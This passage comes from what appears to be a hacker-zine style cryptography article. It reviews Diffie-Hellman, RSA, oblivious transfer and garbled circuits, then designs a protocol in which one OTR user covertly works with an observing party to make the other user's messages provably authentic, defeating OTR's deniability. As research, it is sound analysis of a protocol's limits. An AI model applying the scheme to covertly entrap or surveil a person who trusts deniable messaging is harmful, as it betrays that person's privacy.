+   4.3 - Sending and Receiving Messages
+   4.4 - The Final Protocol
+   4.5 - What's Left
+
+  5 - References
+
+  6 - Greetingz
+
+--[ 1 - Introduction
+
+Recent cryptographic primitives and protocols offer a wide range of
+features besides confidentiality and integrity. There are many protocols
+that have more advanced properties, such as forward secrecy, deniability or
+anonymity. In this article, we're going to have a deeper look at
+deniability in communication (e.g. messaging) protocols. One protocol that
+claims to offer deniability is OTR. Although our construction can probably
+be extended in a quite general way, we'll stick with OTR as an example
+protocol. Our goal is to show the limits of deniability, especially in
+protocols that offer message integrity features (as OTR does). We will do
+this by constructing a protocol that enables each partner in a conversation
+to cooperate with an observing party, such that he can prove the
+authenticity of any message that was part of the conversation to the
+observing party.
+
+------[ 1.1 - Prelude
+
+It was one of these days sitting together with bruhns and discussing stuff
+(TM). Out of the sudden, he came up with the question: "You know, I'm
+asking myself what a trusted timestamping service could be good for...?". I
+told him "timestamps, most probably". He was like "Uhm, yes. And wouldn't
+that affect the deniability of OTR somehow?". We discussed the matter for
+quite a while and we finally agreed that a trusted timestamping service
+itself wouldn't be enough to destroy the deniability of OTR. But our
+interest remained...
+
+--[ 2 - Preliminaries
+
+In this section, we're going to give a quick overview of cryptographic
+primitives we're gonna use. If you're already familiar with those, you can
+happily skip our explanations and get to the real meat. The explanations
+in this section will not contain all the mathematical background (i.e.
+proofs ;) ), which is necessary to really *understand* what's going on.
+We'd rather like to provide a high-level overview of how all the individual
+components and how they can be combined.
+
+------[ 2.1 - Symmetric Operations
+
+We'll keep this real short; you probably know the most common symmetric
+crypto algorithms. We will be using symmetric block ciphers (such as AES)
+and hash functions (SHA for instance). Also, we will need MAC functions in
+the following sections. You might already know HMAC, which is a MAC scheme
+based on hash functions. MACs (Message Authentication Codes) are used to
+protect the integrity of messages. Being a symmetric primitive, creating
+and verifying the MAC requires knowledge of the same key. If someone can
+verify a MAC, they can also create one.
+
+------[ 2.1 - Diffie-Hellman
+
+The Diffie-Hellman scheme is one of the most widely used key establishment
+protocols today. The basic idea is the following: Alice and Bob want to
+securely establish a key over an insecure channel. Diffie-Hellman enables
+them to do this. During such a key-exchange both parties publicly send some
+values and after the communication is finished, both can compute a common
+key, which can *not* be computed by anyone who wiretaps the communication.
+
+--------[ 2.1.1 The Math behind it
+
+Alice and Bob agree on a prime p and some "generator" g. We won't discuss
+too many details of the mathematical background here (if you're interested
+in math, refer to [1]), so it's sufficient to say that in practice, g will
+often have the value 2 and the prime p will be large. In many cases, p and
+g are fixed parameters, on which both parties rely. Before describing the
+actual protocol, we want to show one interesting observation: Given some
+number x, it's trivial to compute values y = g^x mod p ("square and
+multiply" are the magic words). Given the value y however, it's not trivial
+at all to compute the value of x ("discrete logarithm problem", if you're
+interested). This property can be used to build a key-establishment scheme
+like this:
+
+A --------------- a = g^x mod p --------------> B
+A <-------------- b = g^y mod p --------------- B
+
+A picks a random x, computes a = g^x mod p and sends that value over to B.
+B picks a random y, computes b = g^y mod p and sends that value over to A.
+The values a and b are also referred to as Diffie-Hellman public keys.
+A now performs the following computation:
+
+(2.1.1) ka = b^x mod p
+
+B does the same and computes
+
+(2.1.2) kb = a^y mod p
+
+We can observe that due to the equation
+
+(2.1.3) ka = b^x mod p = (g^y)^x = g^(yx) = g^(xy) = (g^x)^y = a^y = kb
+
+ka and kb are equal. So A and B have established a common key k
+(k = ka = kb). As an attacker however neither knows x nor y, he cannot
+perform the same computation. The attacker could try to obtain x from a,
+but as we outlined above, this is (hopefully) computationally infeasible
+for large primes p and good generators g. In case of an active attacker,
+this scheme can be broken by a simple man-in-the-middle attack, where the
+attacker replaces Alice's and Bob's values by his own ones and then proxies
+the traffic between both parties. This problem can be fixed by making use
+of an authentication scheme: Alice and Bob need to "sign" the values that
+they transfer, so that the attacker cannot modify them without destroying
+the signature. There are many signature schemes out there (for instance
+based on RSA, which is described below) and all of them come with
+additional costs (you need to exchange public keys beforehand etc.). We
+assume you know about all the higher-level problems, such as key
+distribution, revocations, trust-models, etc. The basic principle of
+Diffie-Hellman however stays the same - and that is what we're going to
+focus on later in this article.
+
+------[ 2.2 - RSA
+
+Another gem of modern cryptography is the RSA crypto system. RSA is also
+based on modular arithmetic, but it works in a different way than
+Diffie-Hellman. Alice wants Bob to send her an encrypted message. However,
+Alice and Bob have not exchanged any key material (if they had, Bob could
+just make use of any block-cipher like AES to send encrypted data to
+Alice). With RSA, Alice can send Bob a thing called her "public key". This
+public key can be used by Bob to encrypt messages. However, nobody can
+decrypt messages encrypted with Alice's public key without knowing another
+piece of information called Alice's "secret key". As the name suggests,
+Alice keeps her secret key secret. Therefore everybody can encrypt messages
+for Alice, but nobody besides Alice can decrypt these messages.
+
+--------[ 2.2.1 More Math
+
+Alice wants to receive messages from Bob, so she first needs to generate an
+RSA key-pair. Alice does the following: She picks two primes p and q and
+computes
+
+(2.2.1) N = p * q
+
+She picks a value e (in practice, e = 65537 is a common choice) and
+computes
+
+(2.2.2) d = e^-1 mod (p-1)(q-1) (i.e. e*d = 1 mod (p-1)(q-1))
+
+This computation can be performed efficiently using the extended euclidean
+algorithm (but again, we won't dive into all the mathematical details too
+much). Alice keeps all the values besides N and e secret.
+
+A ---------------- N = p * q, e --------------> B
+A <--------------- c = m^e mod N --------------- B
+
+Alice now sends over N and e to Bob. Bob uses N and e to encrypt his
+message m as follows:
+
+(2.2.3) c = m^e mod N
+
+Then, Bob sends the ciphertext c over to Alice. Alice can use d to decrypt
+the ciphertext:
+
+(2.2.4) m = c^d mod N
+
+This works due to the way e and d are chosen in equation (2.2.2).
+To decrypt the ciphertext, an attacker could of course try to compute d.
+But computing d is hard without knowing p and q. And obtaining p and q from
+N is assumed to be an infeasible problem for large values of N.
+
+The tuple (N, e) is commonly called an RSA public key, whereas (N, d) is
+called private key. We can view an RSA instance (with fixed keys) as a set
+of two functions, f and f^-1, where f is the function that encrypts data
+using the public key and f^-1 is the function that decrypts data using the
+private key. We'll call such functions one-way functions.
+
+Instead of encrypting data with the receiver's public key, we can also use
+RSA as a signature scheme. The signer of a message first uses a hash
+function on his message. He then encrypts the hash value with his private
+key. This signature can be verified using the signer's public key: the
+verifier uses the public key to decrypt the hash value, computes the hash
+of the message he received and then compares the hashes. An attacker will
+not be able to produce such a signature, because he doesn't know the
+signer's private key.
+
+Please be aware that (like all the other algorithms described in this
+document), RSA should in practice not be used as described above. In
+particular, we did not describe how to correctly convert messages into
+numbers (RSA operates on natural numbers, remember?) and how to securely
+pad plaintexts. Depending on the respective security goals, there are a
+number of possible padding schemes (such as OAEP+), but we're not going to
+describe them here in detail.
+
+------[ 2.3 - Oblivious Transfer
+
+Oblivious transfer is a real funny primitive. Suppose, Bob knows two values
+x0 and x1. Alice wants to obtain one of those values, but she doesn't want
+to tell Bob which value she wants. Now Bob could of course tell Alice both
+values (that way he wouldn't know, which one Alice was interested in).
+However, Bob wants to make some money and so he takes $1k per value. Poor
+Alice however only has $1k, so she can't afford to buy both values from
+Bob. This problem can be solved with an oblivious transfer. An oblivious
+transfer is a cryptographic protocol, so it requires a number of messages
+to be exchanged between Alice and Bob. After the messages are exchanged,
+Alice will receive the value she wanted and Bob won't know which value that
+was.
+
+--------[ 2.3.1 Math Voodoo
+
+There are a number of protocols for performing an oblivious transfer, based
+on different cryptographic assumptions. We are going to describe one
+classical example here, which can be implemented using a public-key
+cryptosystem (such as RSA). More details of this construction can be found
+in [7].
+
+The system works like this: Bob picks one-way functions f, f^-1 and sends f
+over to Alice. Along with f, he sends two random values r0 and r1. You can
+think of f and f^-1 as RSA functions using fixed keys (as described above).
+
+A <---------------- f, r0, r1 -------------- B
+A ------------- z = f(k) XOR rb -----------> B
+
+Alice wants to receive value xb (b = 0 or 1) from Bob. She picks a random
+k, computes f(k) and XORs it with r0 if she wants to receive x0 or with r1
+if she wants to receive x1. The XOR operation is sometimes also called
+"blinding". Depending on the cryptosystem that is used to obtain f and
+f^-1, there might be more appropriate choices then just using XOR. For RSA,
+it would be natural to use integer addition and subtraction (modulo N)
+instead of the XOR operation.
+
+Alice now sends the result z to Bob. Bob performs some computations:
+
+(2.3.1) k0 = f^-1(z XOR r0)
+(2.3.1) k1 = f^-1(z XOR r1)
+
+One of the k values will be Alice's, but Bob doesn't know which one. The
+other value will be junk, but it's important to note that this junk value
+cannot be computed by Alice (she doesn't know f^-1). Now Bob simply does
+the following:
+
+A <---------- x0 XOR k0, x1 XOR k1 --------- B
+
+Depending on which k value is the one that Alice actually knows, she can
+decrypt x0 or x1. And that's it: Alice now knows the value she wanted to
+receive and one junk value, which doesn't tell her anything. Bob however
+doesn't know which of the k values was the one that Alice picked, so he he
+cannot tell, which value Alice wanted to receive.
+
+Let's try it out:
+Say Bob hast two values x0 = 7 and x1 = 1. He is willing to share one with
+Alice. First he generates f and f^-1. To do that, he just uses RSA. He
+picks two prime numbers p = 5 and q = 11 and gets N = 55. Also, he picks
+e = 3 as encryption exponent (don't do that at home, kids!). The
+decryption exponent would then be d = 27 (you can compute that using the
+euclidean algorithm or alternatively you could just believe us). Bob now
+can send out (N, e) = (55, 3) to Alice, along with some random values
+(r0, r1) = (4, 9).
+
+Suppose Alice wants to retrieve the value of x1. First of all, she picks a
+random k, let's say k = 6. She encrypts it using the public key Bob sent
+(i.e. she applies Bob's one-way function): f(6) = 6^3 mod 55 = 51. She
+computes z = f(k) + r1 = 51 + 9 mod 55 = 5, which she sends to Bob.
+
+Bob now determines his candidates for k (i.e. k0 and k1) by computing:
+k0 = f^-1(z - r0) = (5 - 4)^27 mod 55 = 1
+k1 = f^-1(z - r1) = (5 - 9)^27 mod 55 = 6 <-- Alice's k, but Bob doesn't
+                                              know that
+Bob then sends to Alice: x0 + k0 = 7 + 1 and x1 + k1 = 1 + 6.
+
+Alice receives the two values 8 and 7. She knows that Bob's second value
+was x1 + k. As she is interested in x1, she takes that value and computes
+x1 = (x1 + k1) - k = 7 - 6 = 1 (observe that k = k1, which only Alice
+knows). Now Alice could try to cheat and to also obtain x0. But to do that,
+she would need to know the value that Bob computed for k0, which she won't
+be able to compute without knowing f^-1 (i.e. the secret exponent d in our
+case).
+
+------[ 2.4 - Secure Function Evaluation
+
+Secure function evaluation is another real gem of modern cryptography. A
+classical example is the 0day problem. Two hackers A and B have a certain
+number of 0day exploits each. They want to determine who is more elite, but
+they are so paranoid that they don't even want the other to know how many
+0days they have. So, A knows some number x, B knows y and both want to
+compute the function f(x, y) = { 1 if x > y, -1 if y > x and 0 otherwise}.
+Secure Function Evaluation solves this problem. Again, both parties
+exchange a number of messages and after this is done, both of them know the
+result of the function without having learned anything about the input of
+the other party. And instead of the function shown above, they could just
+arbitrarily agree on any function to be evaluated.
+
+One interesting practical application of SFE is to perform mutual
+authentication based on a shared secret. Two parties knowing a shared
+secret can jointly compute the function
+f(x, y) = {1 if x = y, 0 otherwise}. Interestingly, the OTR protocol makes
+use of such a SFE scheme for authentication.
+
+--------[ 2.4.1 More Voodoo
+
+Suppose there is a function f(x, y), which two parties want to compute
+(this is actually secure two-party computation, which is not the most
+general case - for our purpose however it is sufficient). Both want to
+share the result and both want to keep their own inputs safe. There are
+several constructions that allow us to perform SFE. We'll discuss only one
+of them here: Yao's garbled circuits [3]. As the name suggests, the
+function to be evaluated by both parties first has to be transformed to a
+boolean circuit. For many functions, this is generally not a problem.  The
+next step is to "garble" the circuit. The main idea behind this garbling
+process is that we want everyone to be able to evaluate the circuit, while
+nobody should see what he actually evaluates. Therefore, we will try to
+hide all the bits that "flow" through the circuit. For hiding the bits, we
+could make use of a block cipher. However, we have to take care that the
+circuit can still be evaluated! Therefore, we will also have to modify all
+the gates in the circuit somehow, so that they are able to work with
+"garbled" inputs. Now one could imagine that such a modification is a hard
+task. Fortunately, there's a simple trick: All the gates in our circuit are
+very small boolean functions (by small we mean that they don't have many
+inputs). We can therefore replace every gate by its truth table. The truth
+table simply maps the input bits to the respective output bits. For a
+simple NAND gate, the truth table would look like this:
+
+\a|
+b\| 1 0
+--+----
+1 | 0 1
+0 | 1 1
+
+Now that we have replaced every gate by its truth table, we will just have
+to modify the truth tables, so that they reflect the fact that all the bit
+values are garbled. The trick here is the following: Instead of the real
+values of the input bits (1 or 0), we pick random cryptographic keys (say
+128 bits long). We will then use those keys to encrypt the values in the
+truth table. Instead of the input values for the gate, we will then use the
+random keys (i.e. instead of 1 or 0, we just pick two random bitstrings per
+wire).
+
+As an example, consider a NAND gate again. We choose four keys ka0, ka1,
+kb0 and kb1. Those are the keys for the respective input values of the gate
+(i.e. a=0, a=1, b=0, b=1). Also, we pick an encryption function E and a
+decryption function D. For simplicity, we assume that if a wrong key is
+supplied to D, it will signal this (e.g. return an error code) instead of
+providing a junk plaintext. We now perform the following transformation on
+the truth table of our gate:
+
+\a|                 \    a|
+b\| 1 0          b   \    | 1               0
+--+-----  -----> ---------+--------------------------------
+1 | 0 1                1  | E_ka1(E_kb1(0)) E_ka0(E_kb1(1))
+0 | 1 1                0  | E_ka1(E_kb0(1)) E_ka0(E_kb0(1))
+
+The elements in the truth table are double encrypted using the two keys
+that belong to the values of a or b, respectively. When evaluating the
+circuit, you only know the keys that correspond to the correct input values
+(so for example you know ka0 and kb1 but no other key). By simply trying to
+decrypt every value in the table, it is easy to find the according output
+value (only one decryption will succeed).
+
+The next question would then be: How to garble a whole circuit? It's not
+much different. Assume that two gates are connected like this:
+
+    Out
+     |
+  +------+
+  |  G1  |
+  +------+
+   |   |
++---+ In_3
+|G2 |
++---+
+ |   \
+In_1 In_2
+
+We have inputs In_1, In_2, In_3 and one output value Out. G2's output is
+connected to one of the input wires of G1. In the truth table of G2, we
+therefore put the *key* that corresponds to the respective input value of
+G1 (so instead of double-encrypting G2's output value 1 or 0, we
+double-encrypt the respective key for one of G1's input pins). The gate G1
+can be garbled as described above. The keys for the input wires In_1, In_2
+and In_3 are assumed to be already known by the party evaluating the
+circuit. G2 can now easily be evaluated and yields the missing key for
+evaluating the gate G1. However, during the evaluation of the circuit, no
+intermediate values (like the real output of G2) are disclosed to the
+evaluating party.
+
+Let's try that in practice:
+Say Alice and Bob want to evaluate a function. The following protocol can
+be used: A prepares a garbled circuit and hard-codes her input values into
+the circuit. She sends the result to B. B now needs to retrieve the keys
+for his input values from A. But beware of two limitations here:
+1) B doesn't want to disclose his input values to A (obviously).
+2) A doesn't want to tell B the keys for both input values, because
+   then B would be able to reverse-engineer the circuit and to obtain
+   A's input values.
+You've probably already seen the solution: B uses an oblivious transfer to
+obtain the keys for his input values from A. For every bit b of his input
+values, Bob will obliviously obtain the correct key k_b0 or k_b1 like this:
+
+A ---------------- f, r0, r1 --------------> B
+A <------------- z = f(k) XOR rb ----------- B
+A -------- k_b0 XOR k0, k_b1 XOR k1 -------> B
+
+B is now able to evaluate the whole circuit. Depending on how A built the
+circuit, the output truth tables could contain real or garbled values.
+Using some simple tricks, we can even split the output between A and B (so
+that A gets some part of the result and B gets another part). We'll detail
+on that later. Now there are some problems when one party isn't honest.
+Alice for instance could just prepare a malicious circuit that leaks
+information about Bob's secret inputs. There are ways to prevent such
+attacks ("cut and choose", zero knowledge proofs, etc), but we won't
+provide the details here. A more detailed description (along with a
+security proof) can be found in [3].
+
+--[ 3 - OTR
+
+For those who are not familiar with the OTR protocol, this section might
+provide some help. OTR features a number of cryptographic properties,
+including confidentiality, integrity, forward secrecy and deniability.
+There are two major phases of the protocol: initial key exchange and
+message exchange. The initial key exchange is based on the Diffie-Hellman
+protocol. It is referred to as AKE (Authenticated Key Exchange). To defend
+against active attackers, a public-key signature scheme (DSA in this
+particular case) is used. The DSA master keys have to be exchanged
+beforehand (OTR also offers to authenticate DSA keys using the SMP
+protocol, but that's not interesting in our case).
+
+All the cryptographic details are provided in [2]; it's not particularly
+helpful to repeat them here. Keeping in mind that OTR's key exchange is
+based on Diffie-Hellman combined with some symmetric crypto and a signature
+scheme will suffice. After the key-exchange phase, each party will have a
+number of symmetric keys for encryption and authentication. Those are
+derived from the Diffie-Hellman master key by hashing it in various ways
+(encryption and MAC key will obviously be different).
+
+The messages are encrypted using AES in CTR mode, and each message is MACed
+using the symmetric key material. That offers us confidentiality and
+integrity. It's important to note that *only* symmetric keys are used for
+the actual payload crypto. The DSA master keys are only used in the initial
+key-exchange phase.
+
+The next feature we're going to look at is forward secrecy. Forward secrecy
+means that even if the (DSA) key of a participant is disclosed, past
+conversations cannot be compromised. Forward secrecy in OTR is established
+by the Diffie-Hellman protocol: after a conversation ends, both parties can
+safely wipe the Diffie-Hellman key that they generated. There is no way for
+an attacker (and not even for the conversation partners) to re-compute that
+key afterwards: to do that, one would either need to know the private
+exponent of one party (which is of course also wiped from memory) or one
+would need to derive the key from the public information exchanged between
+both parties, which is infeasible (hopefully; that's what Diffie-Hellman
+relies on in the first place).
+
+Having understood how OTR provides forward secrecy, we can move on to
+deniability. During the conversation, both parties can be sure that the
+messages they receive are authentic and not modified by an attacker. It is
+immediately clear that the message authenticity can not be verified without
+the MAC key. If one of the conversation partners wants to convince a third
+party that a message is authentic, this conversation partner implicitly
+proofs his knowledge of the MAC key to the third party. But then again, the
+third party can not be sure that the conversation partner didn't fake the
+message (he can do this as he knows the MAC key). This is what we call weak
+deniability [4]. Obviously, OTR offers weak deniability, as message
+authentication is performed using only symmetric primitives. But OTR offers
+even more: In every message, the sending party includes a new
+Diffie-Hellman key exchange proposal. The proposal is also covered by the
+MAC to rule out MITM attacks. So both parties frequently generate new key
+material. And this lets us do a nice trick: as soon as they generate new
+MAC keys they publicly disclose the old MAC keys. The old keys aren't used
+anymore, so this is safe. But as the MAC keys are public, *everybody* could
+create fake messages and compute proper MACs for those. This is what we
+call strong deniability. OTR ships with a toolkit containing software for
+actually forging messages. Depending on how much you already know (only the
+MAC keys, MAC and encryption keys, MAC keys and some message plaintext),
+you can use different tools to forge messages. If you know parts of the
+plaintext and the MAC keys, you can exploit the fact that AES is used in
+CTR mode to directly modify the known parts of the plaintext. If there is
+no known plaintext, the otr_remac tool might helpful: Every message
+contains a new Diffie-Hellman key exchange proposal in plaintext (but
+covered by the MAC). Now you can simply replace that proposal by one that
+you generated (e.g. using the otr_sesskeys tool) and compute a new MAC for
+the packet. That allows you to easily fake the rest of the conversation:
+You know your own private Diffie-Hellman key, so you can generate a
+plausible set of MAC and encryption keys and just use that one. It will
+look legitimate because the modified packet (containing your key exchange
+data) still has a valid MAC.
+
+--[ 4 - The Attack
+
+The deniability of OTR stems from the fact that a third party does not know
+whether a message has been sent during a conversation (and before the MAC
+keys were disclosed) or was generated afterwards (when the MAC keys were
+public). An obvious way to attack OTR's deniability would therefore be to
+just monitor all the OTR traffic between A and B. If one party now decides
+to disclose the MAC and encryption keys used for a particular message, the
+authenticity of that message can be verified. And as the message has been
+recorded during the conversation (i.e. before the MAC keys were public),
+the recording party knows that it was not generated afterwards.
+
+Let's look at a real-life example to shed some more light on what we're
+doing. Imagine two hackers A and B who want to talk about serious stuff
+(TM) using OTR. Both of them are slightly paranoid and don't trust each
+other. In particular, Bob fears that Alice might backstab him. However, as
+OTR is deniable, Bob assumes that even if Alice discloses the contents of
+their conversation, he could still plausibly argue that Alice just made it
+up to discredit him. So Bob ignores his paranoia and tells Alice his
+secrets. Alice indeed plans to backstab Bob. Her first plan is simple: She
+will just submit all the encrypted and authenticated messages to the
+police. The police will later be able to state in court that Alice didn't
+fake the messages after the conversation. She however quickly realizes that
+this approach is inherently flawed: Bob could argue that Alice just sent
+fake messages to the police (as Alice knows all the keys she could generate
+such fake messages). Alice knows that this problem could be fixed if the
+Police sniffed all the traffic themselves. But she also knows that this is
+going to be difficult, so she comes up with a second idea: Why not use a
+trusted third party?
+
+Instead of submitting her messages to the police, she will just disclose
+her private DSA key to her lawyer. Then, during her conversation with Bob,
+she will use her lawyer as a proxy (i.e. she will let *him* do the
+crypto). This way the lawyer can be sure that the conversation is
+authentic. The judges will trust Alice's lawyer in court (at least they'll
+trust him more than they trust Alice), so her problem is solved. Alice's
+setup would look like this:
+
+    +-------+
+    | Alice |
+    +-------+
+        ^
+        | Non-OTR (maybe SSL)
+        v
+ +------------+
+ |   Lawyer   |    trust    +----------------+
+ | Speaks for | <---------> | Police / Court |
+ |   Alice    |             +----------------+
+ +------------+
+        ^
+        | OTR (Bob thinks he talks to Alice)
+        v
+    +-------+
+    |  Bob  |
+    +-------+
+
+But now Alice realizes that she doesn't trust her lawyer enough to give him
+her private DSA key: He could misuse it to impersonate her. Also, Alice
+doubts that her lawyer's words would be trusted enough in court.
+
+This example shows the problems that Alice has when she wants to break the
+deniability of OTR. Her problems can be summarized as follows (we'll now
+call the police the "observing party" and the lawyer will be called
+"trusted third party"):
+a) The observing party needs to sniff the network traffic. That implies
+   quite a privileged network position, as the traffic needs to be sniffed
+   passively, i.e. without the help of A or B. Because if A or B would
+   send their traffic to the observing party, A or B might just insert
+   bogus messages into their "sniff" stream and the observing party
+   couldn't be sure about the authenticity. Even worse, paranoid A and B
+   could use an anonymizing network, so that sniffing their traffic would
+   be a non-trivial task.
+
+b) Also, the authenticity of a message can only be proven to the observing
+   party, but not to anybody else (as anybody else didn't sniff the traffic
+   and the observing party could just have cut some pieces or inserted new
+   ones).
+
+Problem b) is not that much of importance. Just imagine the observing party
+as the police, the judges or even Fnord. You should always assume that the
+observing party is exactly the guys you wanna protect yourself against. If
+you think that the police probably won't even get all the crypto stuff and
+therefore just believe any plaintext logfile you show them, that's OK
+(you're probably right). There might however be agencies that would not
+really trust plaintext logs. And those agencies might be very interested in
+the contents of some OTR conversations.
+
+Problem a) remains open. Obviously, neither A nor B really trust the
+observing party. If we had a trusted third party, we actually could mount
+an attack against OTR's deniability, just as described in the lawyer
+example above. Well, lucky us, neither A, nor B, nor the observing party
+trust anybody and therefore, there will be no trusted third party ;)
+
+Really? Interestingly, a trusted third party can be emulated using secure
+function evaluation. This is what we didn't tell in the section above: You
+can view a secure function evaluation scheme as a replacement for a trusted
+third party. So instead of letting a third party compute some function
+f(x, y), A and B can perform the computation on their own and still get the
+same result: both players only receive f(x, y) but A doesn't see y and B
+doesn't see x. So the main idea of our attack is: Emulate a trusted third
+party using secure function evaluation. The setup that Alice now plans is
+the following:
+
+    +-------+
+    | Alice |<-----------+
+    +-------+            |
+        ^                |
+        |                | SFE Voodoo for emulating the lawyer
+        |                |
+        |                v
+        |        +----------------+
+        |        | Police / Court |
+        |        +----------------+
+        |
+        | OTR
+        |
+        v
+    +-------+
+    |  Bob  |
+    +-------+
+
+Our central idea is the following: A can send all the messages she received
+from B to the observing party (the police in the figure above, but that
+could really be everyone). The messages are still encrypted, so this is not
+a problem. To make sure that the messages are not faked by A, we need to
+make sure that A cannot produce valid MACs without the help of the
+observing party. We therefore share the MAC key between A and the observing
+party. Every time, A wants to validate or produce a MAC, she has to
+cooperate with the observing party. Later on, A can reveal the encryption
+key for any message to the observing party, which can be sure that the
+message is authentic.
+
+In the following section (4.1 - 4.3), we will provide a high-level overview
+of the attack. In section 4.4, you can find the actual protocol that Alice
+and the observing party use.
+
+------[ 4.1 - Sharing Diffie-Hellman Keys
+
+OTR uses Diffie-Hellman to establish sort-lived MAC and encryption keys.
+The first part of our exercise is therefore to build a Diffie-Hellman
+compatible 3-party protocol that allows for sharing the generated key
+between two parties. The following protocol between Alice (A), Bob (B)
+and the observing party (O) works:
+
+O ----- g^o ----> A ---- (g^o)^a ----> B
+O <---- g^a ----  A
+                  A <---   g^b   ----  B
+
+All computations are done modulo some prime p and g is a generator of a
+sufficiently large subgroup of Z_p*, just as Diffie-Hellman mandates.
+B will now compute g^oab as key. However, neither A nor O can reproduce
+that key. If A wanted to compute it, she would need to know O's secret
+exponent o. Similar for O. We can therefore say that the key k is shared
+between O and A, in the sense that A and O need to cooperate in order to
+actually use it.
+
+------[ 4.2 - Generating MAC and Encryption Keys
+
+Now that we have established a shared Diffie-Hellman key, we need to
+securely derive the MAC and encryption keys from it. Let's assume we have a
+circuit C, which takes the shared Diffie-Hellman key k as input and returns
+the corresponding MAC and encryption keys as output. This circuit follows
+immediately from the OTR specification. Before we can evaluate the circuit,
+we first need to compute k (which neither A nor O know at this time). So
+the overall function that A and O want to compute is:
+
+f(a, o) = C(((g^b)^a)^o mod p)
+
+We can transform this function to a new circuit and evaluate it together
+(i.e. A and O evaluate the circuit). After the evaluation, A could get the
+encryption keys. But that's not a good idea, because the OTR spec mandates
+that MAC_key = hash(encryption_key). If A knew the encryption key, she
+could compute the according MAC key. Also, it would be bad if O would get
+the MAC keys, because then O could impersonate A and B. Therefore, we'll
+slightly modify the circuit, so that A may pick a random bit string, which
+the circuit XORs to the MAC key and to the encryption key (assuming the
+random string is long enough for both keys). The "blinded" MAC and
+encryption keys are then provided to A and O, the bitmask remains in A's
+memory. If they want to use one of the keys for something, they will
+evaluate a circuit that first XORs both halves together and then does the
+actual computation using the key. At no point in time, A or O actually
+learn the MAC or the encryption key.
+
+Now that we know how to generate all the symmetric key material, we are
+able to perform the full initial key exchange phase of OTR.
+
+------[ 4.3 - Sending and Receiving Messages
+
+When A receives a message from B, she cannot immediately decrypt it because
+she doesn't know the decryption key. Also, verifying and sending messages
+needs O's cooperation.
+
+1) Message Decryption
+   If A wants to decrypt one of B's messages, she cooperates with O. Both
+   parties will jointly evaluate a decryption circuit. The circuit will be
+   built in such a way that only Alice will learn the result (i.e. Alice
+   will again provide a random bitstring as input the the circuit, which is
+   XORed to the result).
+
+2) Message Verification
+   If A wants to verify one of B's messages, she has to cooperate with O.
+   A and O will jointly evaluate some sort of HMAC circuit, in order to
+   find out whether a message is authentic or not. We can design the
+   message verification function in such a way that O will immediately
+   learn the encrypted message and the MAC verification result. This
+   enables A to afterwards reveal the encryption key for a particular
+   message, so that O will be convinced A didn't fake it.
+
+3) Message Creation
+   When A wants to create a message, she encrypts it together with O, just
+   as described in 1). In order to compute a MAC for the message, A and O
+   again cooperate. As each message has to contain a new Diffie-Hellman
+   public key, A and O will jointly compute such a key using the scheme
+   outlined above.
+
+------[ 4.4 - The Final Protocol
+
+In this section we'll describe our final protocol. It offers the following
+features:
+* We have three parties: A, B and O. A and O cooperate to backstab B. B is
+  not able to deny any of his messages towards O.
+* O will not learn any message plaintext, unless A explicitly tells O the
+  respective keys.
+* O is not able to impersonate neither A nor B.
+* No trust relation between A and O is required.
+* A does not have to disclose a whole conversation to O; it is possible to
+  only disclose selected messages.
+* B does not notice that A and O cooperate.
+
+---------[ 4.4.1 - Initial Key-Exchange
+
+This section describes OTR's authenticated key-exchange (AKE).
+Bob starts the key exchange by picking a random r and x and sending
+AES_r(g^x), HASH(g^x) to Alice. That's the regular OTR protocol. Alice
+then does a Diffie-Hellman key-exchange with O as outlined in section
+4.1. We assume that A and O communicate over a secure channel.
+
+O                            A <-------- AES_r(g^x), HASH(g^x) ----- B
+O <------- g^a ------------- A
+O -------- g^o ------------> A
+
+Now Alice sends her Diffie-Hellman public key to Bob. Note that she doesn't
+know the private exponent of the key: she knows only a and g^ao, but
+neither ao nor o.
+
+                             A ------------------ g^ao ------------> B
+
+Bob has already computed the common key k (which Alice can't do) and uses
+it to derive encryption keys c and c' and MAC keys m1, m1', m2, m2' (see
+the OTR specs [2] for details) by hashing k in various ways. Bob builds
+the following messages:
+
+M_B = MAC_m1(g^x, g^ao, pub_B, keyid_B)
+X_B = pub_B, keyid_B, sig_B(M_B)
+
+Where pub_B is Bob's public DSA key and keyid_B is an identifier for Bob's
+Diffie-Hellman proposal g^x. sig_B is created using Bob's DSA key. Using
+the already derived symmetric keys, he sends AES_c(X_B),MAC_m2(AES_c(X_B))
+over to Alice.
+
+                             A <- r, AES_c(X_B),MAC_m2(AES_c(X_B)) - B
+
+Alice is now supposed to also derive all the symmetric keys
+and to use them to decrypt and verify the stuff that Bob sent. But Alice
+cannot do that, so she cooperates with O. O sends her a garbled circuit C1,
+which will compute
+
+C1(o, a, mask) = (c, c') XOR mask
+
+Alice randomly chooses mask, so only she will learn c and c'. In a number
+of oblivious transfers, Alice receives the keys for her input values from
+O.
+
+O --------- C1 ------------> A\
+                               \
+O -------- <OT> -----------> A  \
+O <------- <OT> ------------ A   |
+O -------- <OT> -----------> A   | Compute c, c' using SFE. Only A
+            .                    | receives the values.
+            .                    |
+            .                   /
+O <----- eval(C1) ---------- A /
+O --- (c,c') XOR mask -----> A/
+
+Now Alice is finally able to decrypt the stuff that Bob sent her. She does
+so and gets X_B. Currently, she is not able to verify the MAC_m2() value
+Bob sent - she'll do that later. First she sends sig_B(M_B) over to O.
+
+O <------- sig_B(M_B) ------ A
+
+In order to actually verify sig_B(M_B), A and O first need to compute M_B.
+As described above, M_B = MAC_m1(g^x, g^ao, pub_B, keyid_B). In order to
+compute that MAC, both parties again need to cooperate. O creates a circuit
+C2, which computes:
+
+C2(o, a, pub_B, keyid_B) = MAC_m1(g^x, g^ao, pub_B, keyid_B)
+
+Alice again uses oblivious transfers to obtain the keys for her secret
+input value a, evaluates the circuit and both parties obtain the result
+M_B.
+
+O --------- C2 --------------> A\
+                                 \
+O -------- <OT> -------------> A  \
+O <------- <OT> -------------- A   |
+O -------- <OT> -------------> A   | Compute M_B using SFE. A and O
+            .                      | receive the value.
+            .                      |
+            .                     /
+O <----- eval(C2) ------------ A /
+O -------- M_B --------------> A/
+
+Now that both have computed M_B, they first check the signature sig_B(M_B),
+just as the OTR protocol mandates. If A and O are convinced that sig_B(M_B)
+is OK, they can verify the MAC_m2(...) that B sent earlier. Again, they
+perform some SFE voodoo to do that. The observing party prepares a circuit
+C3, which computes:
+
+C3(o, a, AES_c(X_B)) = MAC_m2'(AES_c(X_B))
+
+A again uses oblivious transfers to obtain the keys for her input values
+and the result is shared between both parties.
+
+O --------- C3 --------------> A\
+                                 \
+O -------- <OT> -------------> A  \
+O <------- <OT> -------------- A   |
